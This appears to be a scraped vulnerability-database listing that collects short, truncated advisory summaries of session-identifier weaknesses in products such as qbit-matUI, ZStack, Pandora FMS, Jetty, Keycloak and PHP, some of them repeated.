CVE-2023-50473

Cross-Site Scripting XSS vulnerability in bill-ahmed qbit-matUI version 1.16.4, allows remote attackers to obtain sensitive information via fixed session identifiers SID in index.js file...

CVE-2023-50473

Cross-Site Scripting XSS vulnerability in bill-ahmed qbit-matUI version 1.16.4, allows remote attackers to obtain sensitive information via fixed session identifiers SID in index.js file...

CVE-2023-50473

Cross-Site Scripting XSS vulnerability in bill-ahmed qbit-matUI version 1.16.4, allows remote attackers to obtain sensitive information via fixed session identifiers SID in index.js file...

Cross site scripting

Cross-Site Scripting XSS vulnerability in bill-ahmed qbit-matUI version 1.16.4, allows remote attackers to obtain sensitive information via fixed session identifiers SID in index.js file...

CVE-2023-50473

Cross-Site Scripting XSS vulnerability in bill-ahmed qbit-matUI version 1.16.4, allows remote attackers to obtain sensitive information via fixed session identifiers SID in index.js file...

CVE-2023-46326

ZStack Cloud version 3.10.38 and before allows unauthenticated API access to the list of active job UUIDs and the session ID for each of these. This leads to privilege escalation...

ZStack Security Vulnerabilities

ZStack is an open source IaaS Infrastructure as a Service software designed to automate data centers and manage compute, storage, and network resources through APIs. A security vulnerability exists in ZStack Cloud 3.10.38 and earlier versions that stems from allowing unauthenticated API access to...

CVE-2023-4677

Cron log backup files contain administrator session IDs. It is trivial for any attacker who can reach the Pandora FMS Console to scrape the cron logs directory for cron log backups. The contents of these log files can then be abused to authenticate to the application as an administrator. This iss...

PT-2023-8542 · Unknown · Pandora Fms

Name of the Vulnerable Software and Affected Versions: Pandora FMS versions = 772 Description: The issue is related to insufficient protection of registration data in the Pandora FMS Console, allowing an attacker to gain unauthorized access to protected information and elevate their privileges to...

PT-2023-24974 · Xiamen Si Xin Communication Technology · Video Management System

Name of the Vulnerable Software and Affected Versions: Xiamen Si Xin Communication Technology Video management system versions 3.1 through 4.1 Description: An issue was discovered with the JSESSION IDs in the system, allowing attackers to gain escalated privileges. Recommendations: For versions 3...

Atlas Copco Power Focus 安全特征问题漏洞

Atlas Copco Power Focus is a universal tightening system from Atlas Copco Sweden that connects to a wide range of Atlas Copco assembly tools to provide you with a full platform assembly solution. A security vulnerability exists in the Atlas Copco Power Focus 6000 that stems from the server using ...

tss-lib 安全漏洞

tss-lib is an open source IO FinNet implementation of the multi-party t,n- threshold ECDSA Elliptic Curve Digital Signature Algorithm based on Gennaro and Goldfeder 2020 1 and EdDSA Edwards Curve Digital Signature Algorithm. A security vulnerability exists in IO FinNet tss-lib versions prior to...

SUSE CVE-2006-6969

Jetty before 4.2.27, 5.1 before 5.1.12, 6.0 before 6.0.2, and 6.1 before 6.1.0pre3 generates predictable session identifiers using java.util.random, which makes it easier for remote attackers to guess a session identifier through brute force attacks, bypass authentication requirements, and possib...

Spring Session 安全漏洞

Spring Session is a module from Spring. A security vulnerability exists in Spring Session version 3.0.0, which stems from the recording of session IDs into the standard output stream leading to the disclosure of sensitive information...

Securepoint Unified Threat Management 安全漏洞

Securepoint Unified Threat Management Securepoint UTM is a unified threat management from Securepoint, Germany. A security vulnerability exists in Securepoint Unified Threat Management versions prior to 12.2.5.1, which stems from the presence of an information leak. An attacker can exploit the...

The vulnerability of software and hardware components in SCADA systems, such as ABB Pulsar Plus System Controller NE843_S, Infinity DC Power Plant H5692448 G104, Infinity DC Power Plant H5692448 G842, Infinity DC Power Plant H5692448 G224L, Infinity DC Power Plant H5692448 G630-4, Infinity DC Power Plant H5692448 G451C(2), Infinity DC Power Plant H5692448 G461(2), arises due to the use of insufficiently random values. This vulnerability allows unauthorized individuals to gain unauthorized access to session identifiers.

The vulnerabilities of the software and hardware components of SCADA systems, such as ABB Pulsar Plus System Controller NE843S, Infinity DC Power Plant H5692448 G104, Infinity DC Power Plant H5692448 G842, Infinity DC Power Plant H5692448 G224L, Infinity DC Power Plant H5692448 G630-4, Infinity D...

PT-2023-22013 · Unknown · Lemonldap::Ng

Name of the Vulnerable Software and Affected Versions: LemonLDAP::NG versions prior to 2.16.1 Description: An issue was discovered in LemonLDAP::NG that allows attackers to bypass 2FA verification due to weak session ID generation in the AuthBasic handler and incorrect failure handling during a...

CVE-2023-1632

DISPUTED A vulnerability has been found in Ellucian Banner Web Tailor 8.6 and classified as critical. This vulnerability affects unknown code of the file /PRODar/twbkwbis.PFirstMenu of the component Login Page. The manipulation of the argument PIDM/WEBID leads to improper authorization. The attac...

keycloak: Session takeover with OIDC offline refreshtokens

A flaw was found in the offlineaccess scope in Keycloak. This issue would affect users of shared computers more especially if cookies are not cleared, due to a lack of root session validation, and the reuse of session ids across root and user authentication sessions. This enables an attacker to...

SUSE CVE-2007-1522

Double free vulnerability in the session extension in PHP 5.2.0 and 5.2.1 allows context-dependent attackers to execute arbitrary code via illegal characters in a session identifier, which is rejected by an internal session storage module, which calls the session identifier generator with an...